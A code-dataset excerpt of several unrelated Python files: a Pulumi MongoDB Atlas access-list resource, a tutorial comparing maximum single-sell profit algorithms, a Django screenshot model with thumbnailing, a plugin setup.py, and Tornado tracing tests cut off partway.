        if aws_security_group is not None:
            pulumi.set(__self__, "aws_security_group", aws_security_group)
        if cidr_block is not None:
            pulumi.set(__self__, "cidr_block", cidr_block)
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if ip_address is not None:
            pulumi.set(__self__, "ip_address", ip_address)
        if project_id is not None:
            pulumi.set(__self__, "project_id", project_id)
    @property
    @pulumi.getter(name="awsSecurityGroup")
    def aws_security_group(self) -> Optional[pulumi.Input[str]]:
        """
        Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "aws_security_group")
    @aws_security_group.setter
    def aws_security_group(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "aws_security_group", value)
    @property
    @pulumi.getter(name="cidrBlock")
    def cidr_block(self) -> Optional[pulumi.Input[str]]:
        """
        Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "cidr_block")
    @cidr_block.setter
    def cidr_block(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cidr_block", value)
    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """
        Comment to add to the access list entry.
        """
        return pulumi.get(self, "comment")
    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """
        Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        """
        return pulumi.get(self, "ip_address")
    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[pulumi.Input[str]]:
        """
        Unique identifier for the project to which you want to add one or more access list entries.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_id", value)
class ProjectIpAccessList(pulumi.CustomResource):
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen); hand
    # edits are normally overwritten when the SDK is regenerated.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 aws_security_group: Optional[pulumi.Input[str]] = None,
                 cidr_block: Optional[pulumi.Input[str]] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 ip_address: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        `ProjectIpAccessList` provides an IP Access List entry resource. The access list grants access from IPs, CIDRs or AWS Security Groups (if VPC Peering is enabled) to clusters within the Project.
        > **NOTE:** Groups and projects are synonymous terms. You may find `groupId` in the official documentation.
        > **IMPORTANT:**
        When you remove an entry from the access list, existing connections from the removed address(es) may remain open for a variable amount of time. How much time passes before Atlas closes the connection depends on several factors, including how the connection was established, the particular behavior of the application or driver using the address, and the connection protocol (e.g., TCP or UDP). This is particularly important to consider when changing an existing IP address or CIDR block as they cannot be updated via the Provider (comments can however), hence a change will force the destruction and recreation of entries.
        ## Example Usage
        ### Using CIDR Block
        ```python
        import pulumi
        import pulumi_mongodbatlas as mongodbatlas
        test = mongodbatlas.ProjectIpAccessList("test",
            cidr_block="1.2.3.4/32",
            comment="cidr block for tf acc testing",
            project_id="<PROJECT-ID>")
        ```
        ### Using IP Address
        ```python
        import pulumi
        import pulumi_mongodbatlas as mongodbatlas
        test = mongodbatlas.ProjectIpAccessList("test",
            comment="ip address for tf acc testing",
            ip_address="2.3.4.5",
            project_id="<PROJECT-ID>")
        ```
        ### Using an AWS Security Group
        ```python
        import pulumi
        import pulumi_mongodbatlas as mongodbatlas
        test_network_container = mongodbatlas.NetworkContainer("testNetworkContainer",
            project_id="<PROJECT-ID>",
            atlas_cidr_block="192.168.208.0/21",
            provider_name="AWS",
            region_name="US_EAST_1")
        test_network_peering = mongodbatlas.NetworkPeering("testNetworkPeering",
            project_id="<PROJECT-ID>",
            container_id=test_network_container.container_id,
            accepter_region_name="us-east-1",
            provider_name="AWS",
            route_table_cidr_block="172.31.0.0/16",
            vpc_id="vpc-0d93d6f69f1578bd8",
            aws_account_id="232589400519")
        test_project_ip_access_list = mongodbatlas.ProjectIpAccessList("testProjectIpAccessList",
            project_id="<PROJECT-ID>",
            aws_security_group="sg-0026348ec11780bd1",
            comment="TestAcc for awsSecurityGroup",
            opts=pulumi.ResourceOptions(depends_on=["mongodbatlas_network_peering.test"]))
        ```
        > **IMPORTANT:** In order to use AWS Security Group(s) VPC Peering must be enabled like above example.
        ## Import
        IP Access List entries can be imported using the `project_id` and `cidr_block` or `ip_address`, e.g.
        ```sh
        $ pulumi import mongodbatlas:index/projectIpAccessList:ProjectIpAccessList test 5d0f1f74cf09a29120e123cd-10.242.88.0/21
        ```
        For more information see [MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/access-lists/)
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] comment: Comment to add to the access list entry.
        :param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        :param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ProjectIpAccessListArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Create a ProjectIpAccessList resource from a ProjectIpAccessListArgs
        object.  See the property-based overload above for the full usage
        examples, import instructions and behavioral notes.
        :param str resource_name: The name of the resource.
        :param ProjectIpAccessListArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two @overload signatures above: unpack an
        # args-object when one was supplied, otherwise forward keyword args.
        resource_args, opts = _utilities.get_resource_args_opts(ProjectIpAccessListArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       aws_security_group: Optional[pulumi.Input[str]] = None,
                       cidr_block: Optional[pulumi.Input[str]] = None,
                       comment: Optional[pulumi.Input[str]] = None,
                       ip_address: Optional[pulumi.Input[str]] = None,
                       project_id: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared constructor body: validates opts, builds the input-property
        # bag and registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means we are adopting an existing resource; in that case
        # a pre-built __props__ bag is required instead of individual fields.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ProjectIpAccessListArgs.__new__(ProjectIpAccessListArgs)
            __props__.__dict__["aws_security_group"] = aws_security_group
            __props__.__dict__["cidr_block"] = cidr_block
            __props__.__dict__["comment"] = comment
            __props__.__dict__["ip_address"] = ip_address
            if project_id is None and not opts.urn:
                raise TypeError("Missing required property 'project_id'")
            __props__.__dict__["project_id"] = project_id
        super(ProjectIpAccessList, __self__).__init__(
            'mongodbatlas:index/projectIpAccessList:ProjectIpAccessList',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            aws_security_group: Optional[pulumi.Input[str]] = None,
            cidr_block: Optional[pulumi.Input[str]] = None,
            comment: Optional[pulumi.Input[str]] = None,
            ip_address: Optional[pulumi.Input[str]] = None,
            project_id: Optional[pulumi.Input[str]] = None) -> 'ProjectIpAccessList':
        """
        Get an existing ProjectIpAccessList resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] aws_security_group: Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] cidr_block: Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        :param pulumi.Input[str] comment: Comment to add to the access list entry.
        :param pulumi.Input[str] ip_address: Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        :param pulumi.Input[str] project_id: Unique identifier for the project to which you want to add one or more access list entries.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _ProjectIpAccessListState.__new__(_ProjectIpAccessListState)
        __props__.__dict__["aws_security_group"] = aws_security_group
        __props__.__dict__["cidr_block"] = cidr_block
        __props__.__dict__["comment"] = comment
        __props__.__dict__["ip_address"] = ip_address
        __props__.__dict__["project_id"] = project_id
        return ProjectIpAccessList(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="awsSecurityGroup")
    def aws_security_group(self) -> pulumi.Output[str]:
        """
        Unique identifier of the AWS security group to add to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "aws_security_group")
    @property
    @pulumi.getter(name="cidrBlock")
    def cidr_block(self) -> pulumi.Output[str]:
        """
        Range of IP addresses in CIDR notation to be added to the access list. Your access list entry can include only one `awsSecurityGroup`, one `cidrBlock`, or one `ipAddress`.
        """
        return pulumi.get(self, "cidr_block")
    @property
    @pulumi.getter
    def comment(self) -> pulumi.Output[str]:
        """
        Comment to add to the access list entry.
        """
        return pulumi.get(self, "comment")
    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> pulumi.Output[str]:
        """
        Single IP address to be added to the access list. Mutually exclusive with `awsSecurityGroup` and `cidrBlock`.
        """
        return pulumi.get(self, "ip_address")
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Output[str]:
        """
        Unique identifier for the project to which you want to add one or more access list entries.
        """
        return pulumi.get(self, "project_id")
| 49.107991 | 631 | 0.664951 |
066375348ff647f477e0db433ee4238d08535f82 | 14,770 | py | Python | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | elyor0529/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | 12 | 2017-11-15T12:48:06.000Z | 2021-12-28T02:28:24.000Z | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | Dmdv/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | null | null | null | algorithm_and_data_structure/easy_problems/max_profit_tutorial.py | Dmdv/Awesome-Full-Stack-Web-Developer | d7c8a48ba809832270f2061f6872df7b8550699d | [
"MIT"
] | 7 | 2017-07-14T15:38:32.000Z | 2022-03-25T19:53:08.000Z | # @Author: Keith Schwarz (htiek@cs.stanford.edu)
# @Date: Tue, 14th Mar 2017, T 14:43 +01:00
# @Email: me@anasaboureada.com
# @Project: awesome-full-stack-web-developer
# @Filename: max_profit_tutorial.py
# @Last modified by: anas
# @Last modified time: Tue, 14th Mar 2017, T 14:46 +01:00
# @License: MIT License
# @Copyright: Copyright (c) 2017 Anas Aboureada <anasaboureada.com>
# Four different algorithms for solving the maximum single-sell profit problem,
# each of which have different time and space complexity. This is one of my
# all-time favorite algorithms questions, since there are so many different
# answers that you can arrive at by thinking about the problem in slightly
# different ways.
#
# The maximum single-sell profit problem is defined as follows. You are given
# an array of stock prices representing the value of some stock over time.
# Assuming that you are allowed to buy the stock exactly once and sell the
# stock exactly once, what is the maximum profit you can make? For example,
# given the prices
#
# 2, 7, 1, 8, 2, 8, 4, 5, 9, 0, 4, 5
#
# The maximum profit you can make is 8, by buying when the stock price is 1 and
# selling when the stock price is 9. Note that while the greatest difference
# in the array is 9 (by subtracting 9 - 0), we cannot actually make a profit of
# 9 here because the stock price of 0 comes after the stock price of 9 (though
# if we wanted to lose a lot of money, buying high and selling low would be a
# great idea!)
#
# In the event that there's no profit to be made at all, we can always buy and
# sell on the same date. For example, given these prices (which might
# represent a buggy-whip manufacturer:)
#
# 9, 8, 7, 6, 5, 4, 3, 2, 1, 0
#
# The best profit we can make is 0 by buying and selling on the same day.
#
# Let's begin by writing the simplest and easiest algorithm we know of that
# can solve this problem - brute force. We will just consider all O(n^2) pairs
# of values, and then pick the one with the highest net profit. There are
# exactly n + (n - 1) + (n - 2) + ... + 1 = n(n + 1)/2 different pairs to pick
# from, so this algorithm will grow quadratically in the worst-case. However,
# it uses only O(1) memory, which is a somewhat attractive feature. Plus, if
# our first intuition for the problem gives a quadratic solution, we can be
# satisfied that if we don't come up with anything else, we can always have a
# polynomial-time solution.
def BruteForceSingleSellProfit(arr):
# Store the best possible profit we can make; initially this is 0.
bestProfit = 0;
# Iterate across all pairs and find the best out of all of them. As a
# minor optimization, we don't consider any pair consisting of a single
# element twice, since we already know that we get profit 0 from this.
for i in range(0, len(arr)):
for j in range (i + 1, len(arr)):
bestProfit = max(bestProfit, arr[j] - arr[i])
return bestProfit
# This solution is extremely inelegant, and it seems like there just *has* to
# be a better solution. In fact, there are many better solutions, and we'll
# see three of them.
#
# The first insight comes if we try to solve this problem by using a divide-
# and-conquer strategy. Let's consider what happens if we split the array into
# two (roughly equal) halves. If we do so, then there are three possible
# options about where the best buy and sell times are:
#
# 1. We should buy and sell purely in the left half of the array.
# 2. We should buy and sell purely in the right half of the array.
# 3. We should buy in the left half of the array and sell in the right half of
# the array.
#
# (Note that we don't need to consider selling in the left half of the array
# and buying in the right half of the array, since the buy time must always
# come before the sell time)
#
# If we want to solve this problem recursively, then we can get values for (1)
# and (2) by recursively invoking the algorithm on the left and right
# subarrays. But what about (3)? Well, if we want to maximize our profit, we
# should be buying at the lowest possible cost in the left half of the array
# and selling at the highest possible cost in the right half of the array.
# This gives a very elegant algorithm for solving this problem:
#
# If the array has size 0 or size 1, the maximum profit is 0.
# Otherwise:
# Split the array in half.
# Compute the maximum single-sell profit in the left array, call it L.
# Compute the maximum single-sell profit in the right array, call it R.
# Find the minimum of the first half of the array, call it Min
# Find the maximum of the second half of the array, call it Max
# Return the maximum of L, R, and Max - Min.
#
# Let's consider the time and space complexity of this algorithm. Our base
# case takes O(1) time, and in our recursive step we make two recursive calls,
# one on each half of the array, and then does O(n) work to scan the array
# elements to find the minimum and maximum values. This gives the recurrence
#
# T(1) = O(1)
# T(n / 2) = 2T(n / 2) + O(n)
#
# Using the Master Theorem, this recurrence solves to O(n log n), which is
# asymptotically faster than our original approach! However, we do pay a
# (slight) cost in memory usage. Because we need to maintain space for all of
# the stack frames we use. Since on each recursive call we cut the array size
# in half, the maximum number of recursive calls we can make is O(log n), so
# this algorithm uses O(n log n) time and O(log n) memory.
def DivideAndConquerSingleSellProfit(arr):
# Base case: If the array has zero or one elements in it, the maximum
# profit is 0.
if len(arr) <= 1:
return 0;
# Cut the array into two roughly equal pieces.
left = arr[ : len(arr) / 2]
right = arr[len(arr) / 2 : ]
# Find the values for buying and selling purely in the left or purely in
# the right.
leftBest = DivideAndConquerSingleSellProfit(left)
rightBest = DivideAndConquerSingleSellProfit(right)
# Compute the best profit for buying in the left and selling in the right.
crossBest = max(right) - min(left)
# Return the best of the three
return max(leftBest, rightBest, crossBest)
# While the above algorithm for computing the maximum single-sell profit is
# better timewise than what we started with (O(n log n) versus O(n^2)), we can
# still improve the time performance. In particular, recall our recurrence
# relation:
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(n)
#
# Here, the O(n) term in the T(n) case comes from the work being done to find
# the maximum and minimum values in the right and left halves of the array,
# respectively. If we could find these values faster than what we're doing
# right now, we could potentially decrease the function's runtime.
#
# The key observation here is that we can compute the minimum and maximum
# values of an array using a divide-and-conquer approach. Specifically:
#
# If the array has just one element, it is the minimum and maximum value.
# Otherwise:
# Split the array in half.
# Find the minimum and maximum values from the left and right halves.
# Return the minimum and maximum of these two values.
#
# Notice that our base case does only O(1) work, and our recursive case manages
# to do only O(1) work in addition to the recursive calls. This gives us the
# recurrence relation
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(1)
#
# Using the Master Theorem, this solves to O(n).
#
# How can we make use of this result? Well, in our current divide-and-conquer
# solution, we split the array in half anyway to find the maximum profit we
# could make in the left and right subarrays. Could we have those recursive
# calls also hand back the maximum and minimum values of the respective arrays?
# If so, we could rewrite our solution as follows:
#
# If the array has size 1, the maximum profit is zero and the maximum and
# minimum values are the single array element.
# Otherwise:
# Split the array in half.
# Compute the maximum single-sell profit in the left array, call it L.
# Compute the maximum single-sell profit in the right array, call it R.
# Let Min be the minimum value in the left array, which we got from our
# first recursive call.
# Let Max be the maximum value in the right array, which we got from our
# second recursive call.
# Return the maximum of L, R, and Max - Min for the maximum single-sell
# profit, and the appropriate maximum and minimum values found from
# the recursive calls.
#
# The correctness proof for this algorithm works just as it did before, but now
# we never actually do a scan of the array at each step. In fact, we do only
# O(1) work at each level. This gives a new recurrence
#
# T(1) = O(1)
# T(n) = 2T(n / 2) + O(1)
#
# Which solves to O(n). We're now using O(n) time and O(log n) memory, which
# is asymptotically faster than before!
#
# The code for this is given below:
def OptimizedDivideAndConquerSingleSellProfit(arr):
# If the array is empty, the maximum profit is zero.
if len(arr) == 0:
return 0
# This recursive helper function implements the above recurrence. It
# returns a triple of (max profit, min array value, max array value). For
# efficiency reasons, we always reuse the array and specify the bounds as
# [lhs, rhs]
def Recursion(arr, lhs, rhs):
# If the array has just one element, we return that the profit is zero
# but the minimum and maximum values are just that array value.
if lhs == rhs:
return (0, arr[lhs], arr[rhs])
# Recursively compute the values for the first and latter half of the
# array. To do this, we need to split the array in half. The line
# below accomplishes this in a way that, if ported to other languages,
# cannot result in an integer overflow.
mid = lhs + (rhs - lhs) / 2
# Perform the recursion.
( leftProfit, leftMin, leftMax) = Recursion(arr, lhs, mid)
(rightProfit, rightMin, rightMax) = Recursion(arr, mid + 1, rhs)
# Our result is the maximum possible profit, the minimum of the two
# minima we've found (since the minimum of these two values gives the
# minimum of the overall array), and the maximum of the two maxima.
maxProfit = max(leftProfit, rightProfit, rightMax - leftMin)
return (maxProfit, min(leftMin, rightMin), max(leftMax, rightMax))
# Using our recursive helper function, compute the resulting value.
profit, _, _ = Recursion(arr, 0, len(arr) - 1)
return profit
# At this point we've traded our O(n^2)-time, O(1)-space solution for an O(n)-
# time, O(log n) space solution. But can we do better than this?
#
# To find a better algorithm, we'll need to switch our line of reasoning.
# Rather than using divide-and-conquer, let's see what happens if we use
# dynamic programming. In particular, let's think about the following problem.
# If we knew the maximum single-sell profit that we could get in just the first
# k array elements, could we use this information to determine what the
# maximum single-sell profit would be in the first k + 1 array elements? If we
# could do this, we could use the following algorithm:
#
# Find the maximum single-sell profit to be made in the first 1 elements.
# For i = 2 to n:
# Compute the maximum single-sell profit using the first i elements.
#
# How might we do this? One intuition is as follows. Suppose that we know the
# maximum single-sell profit of the first k elements. If we look at k + 1
# elements, then either the maximum profit we could make by buying and selling
# within the first k elements (in which case nothing changes), or we're
# supposed to sell at the (k + 1)st price. If we wanted to sell at this price
# for a maximum profit, then we would want to do so by buying at the lowest of
# the first k + 1 prices, then selling at the (k + 1)st price.
#
# To accomplish this, suppose that we keep track of the minimum value in the
# first k elements, along with the maximum profit we could make in the first
# k elements. Upon seeing the (k + 1)st element, we update what the current
# minimum value is, then update what the maximum profit we can make is by
# seeing whether the difference between the (k + 1)st element and the new
# minimum value is. Note that it doesn't matter what order we do this in; if
# the (k + 1)st element is the smallest element so far, there's no possible way
# that we could increase our profit by selling at that point.
#
# To finish up this algorithm, we should note that given just the first price,
# the maximum possible profit is 0.
#
# This gives the following simple and elegant algorithm for the maximum single-
# sell profit problem:
#
# Let profit = 0.
# Let min = arr[0]
# For k = 1 to length(arr):
# If arr[k] < min, set min = arr[k]
# If profit < arr[k] - min, set profit = arr[k] - min
#
# This is short, sweet, and uses only O(n) time and O(1) memory. The beauty of
# this solution is that we are quite naturally led there by thinking about how
# to update our answer to the problem in response to seeing some new element.
# In fact, we could consider implementing this algorithm as a streaming
# algorithm, where at each point in time we maintain the maximum possible
# profit and then update our answer every time new data becomes available.
#
# The final version of this algorithm is shown here:
def DynamicProgrammingSingleSellProfit(arr):
# If the array is empty, we cannot make a profit.
if len(arr) == 0:
return 0
# Otherwise, keep track of the best possible profit and the lowest value
# seen so far.
profit = 0
cheapest = arr[0]
# Iterate across the array, updating our answer as we go according to the
# above pseudocode.
for i in range(1, len(arr)):
# Update the minimum value to be the lower of the existing minimum and
# the new minimum.
cheapest = min(cheapest, arr[i])
# Update the maximum profit to be the larger of the old profit and the
# profit made by buying at the lowest value and selling at the current
# price.
profit = max(profit, arr[i] - cheapest)
return profit
# To summarize our algorithms, we have seen
#
# Naive: O(n ^ 2) time, O(1) space
# Divide-and-conquer: O(n log n) time, O(log n) space
# Optimized divide-and-conquer: O(n) time, O(log n) space
# Dynamic programming: O(n) time, O(1) space
| 46.740506 | 79 | 0.697427 |
ba35333c6fd444774accc2f12496509eebe77f7c | 4,150 | py | Python | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | 1 | 2015-01-16T04:17:54.000Z | 2015-01-16T04:17:54.000Z | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | null | null | null | observatory/dashboard/models/Screenshot.py | natestedman/Observatory | 6e810b22d844416b2a3057e99ef23baa0d122ab4 | [
"0BSD"
] | null | null | null | # Copyright (c) 2010, individual contributors (see AUTHORS file)
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import Image
import os
from django.db import models
from settings import SCREENSHOT_URL, SCREENSHOT_PATH
from Project import Project
SCREENSHOT_WIDTH = 230.0
SCREENSHOT_HEIGHT = 170.0
MAIN_PAGE_WIDTH = 605.0
MAIN_PAGE_HEIGHT = 300.0
# a screenshot for a project, display on its page. its filename is derived from
# its ID, so it is not required as a field
class Screenshot(models.Model):
class Meta:
app_label = 'dashboard'
# the title of the screenshot
title = models.CharField(max_length = 32)
# a short description of the screenshot
description = models.CharField(max_length = 100)
# what project is this a screenshot of?
project = models.ForeignKey(Project)
# file extension
extension = models.CharField(max_length = 8)
# save override to validate title/description length
def save(self, *args, **kwargs):
self.title = self.title[0:32]
self.description = self.description[0:100]
super(Screenshot, self).save(*args, **kwargs)
# the filename for this file. just the last part, no directory specified.
def filename(self):
return "{0}{1}".format(str(self.id), self.extension)
# the thumbnail filename for this file, no directory specified.
def thumbnail(self):
return str(self.id) + "_t.png"
# the url of a screenshot
def url(self):
return os.path.join(SCREENSHOT_URL, self.filename())
# the thumbnail url of a screenshot
def thumb_url(self):
return os.path.join(SCREENSHOT_URL, self.thumbnail())
# the large thumbnail to be used on the main page
def main_page_url(self):
return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png")
# a static creation method to handle writing to disk
@staticmethod
def create(form, file, project):
# create a screenshot object in the database
screen = Screenshot(title = form.cleaned_data["title"],
description = form.cleaned_data["description"],
project = project,
extension = os.path.splitext(file.name)[1])
screen.save()
# write the screenshot to a file
path = os.path.join(SCREENSHOT_PATH, screen.filename())
write = open(path, 'wb+')
# write the chunks
for chunk in file.chunks():
write.write(chunk)
write.close()
def create_thumbnail(path, save, width, height):
# create a thumbnail of the file
img = Image.open(path)
# resize the image for a thumbnail
scalex = width / img.size[0]
scaley = height / img.size[1]
scale = scalex if scalex > scaley else scaley
img = img.resize((int(img.size[0] * scale),
int(img.size[1] * scale)),
Image.ANTIALIAS)
# crop the image to fit
if img.size[0] > width or img.size[1] > height:
left = (img.size[0] - width) / 2
right = left + width
top = (img.size[1] - height) / 2
bottom = top + height
img = img.crop((int(left), int(top), int(right), int(bottom)))
# save the thumbnail
save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id)))
img.save(save_path, "PNG")
create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT)
create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT)
return screen
| 34.87395 | 79 | 0.675181 |
eb206cad622a448b6d3bfb4109bb2d6233f04bcb | 535 | py | Python | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | att_cybersecurity_alienvault_otx/setup.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
from setuptools import setup, find_packages
setup(name='att_cybersecurity_alienvault_otx-rapid7-plugin',
version='1.0.1',
description='Open Threat Exchange is the neighborhood watch of the global intelligence community',
author='rapid7',
author_email='',
url='',
packages=find_packages(),
install_requires=['komand'], # Add third-party dependencies to requirements.txt, not here!
scripts=['bin/komand_att_cybersecurity_alienvault_otx']
)
| 35.666667 | 104 | 0.71215 |
b359d5f9c3478c40ddf979b07267dd5b8c989a2a | 23,912 | py | Python | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 308 | 2016-12-07T16:49:27.000Z | 2022-03-15T10:06:45.000Z | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 1,928 | 2016-11-28T17:13:18.000Z | 2022-03-31T21:43:19.000Z | tests/contrib/tornado/test_tornado_web.py | melancholy/dd-trace-py | 32d463e5465466bc876c85a45880a84824d9b47c | [
"Apache-2.0",
"BSD-3-Clause"
] | 311 | 2016-11-27T03:01:49.000Z | 2022-03-18T21:34:03.000Z | import pytest
import tornado
from ddtrace import config
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.ext import http
from tests.opentracer.utils import init_tracer
from tests.utils import assert_is_measured
from tests.utils import assert_span_http_status_code
from .utils import TornadoTestCase
from .utils import TracerTestCase
from .web.app import CustomDefaultHandler
class TestTornadoWeb(TornadoTestCase):
"""
Ensure that Tornado web handlers are properly traced.
"""
def test_success_handler(self, query_string=""):
# it should trace a handler that returns 200
if query_string:
fqs = "?" + query_string
else:
fqs = ""
response = self.fetch("/success/" + fqs)
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tornado-web" == request_span.service
assert "tornado.request" == request_span.name
assert "web" == request_span.span_type
assert "tests.contrib.tornado.web.app.SuccessHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 200)
assert self.get_url("/success/") == request_span.get_tag(http.URL)
if config.tornado.trace_query_string:
assert query_string == request_span.get_tag(http.QUERY_STRING)
else:
assert http.QUERY_STRING not in request_span.meta
assert 0 == request_span.error
def test_success_handler_query_string(self):
self.test_success_handler("foo=bar")
def test_success_handler_query_string_trace(self):
with self.override_http_config("tornado", dict(trace_query_string=True)):
self.test_success_handler("foo=bar")
def test_status_code_500_handler(self):
"""
Test an endpoint which sets the status code to 500 but doesn't raise an exception
We expect the resulting span to be marked as an error
"""
response = self.fetch("/status_code/500")
assert 500 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 1 == len(traces[0])
request_span = traces[0][0]
assert_is_measured(request_span)
assert "tests.contrib.tornado.web.app.ResponseStatusHandler" == request_span.resource
assert "GET" == request_span.get_tag("http.method")
assert_span_http_status_code(request_span, 500)
assert self.get_url("/status_code/500") == request_span.get_tag(http.URL)
assert 1 == request_span.error
def test_nested_handler(self):
# it should trace a handler that calls the tracer.trace() method
# using the automatic Context retrieval
response = self.fetch("/nested/")
assert 200 == response.code
traces = self.pop_traces()
assert 1 == len(traces)
assert 2 == len(traces[0])
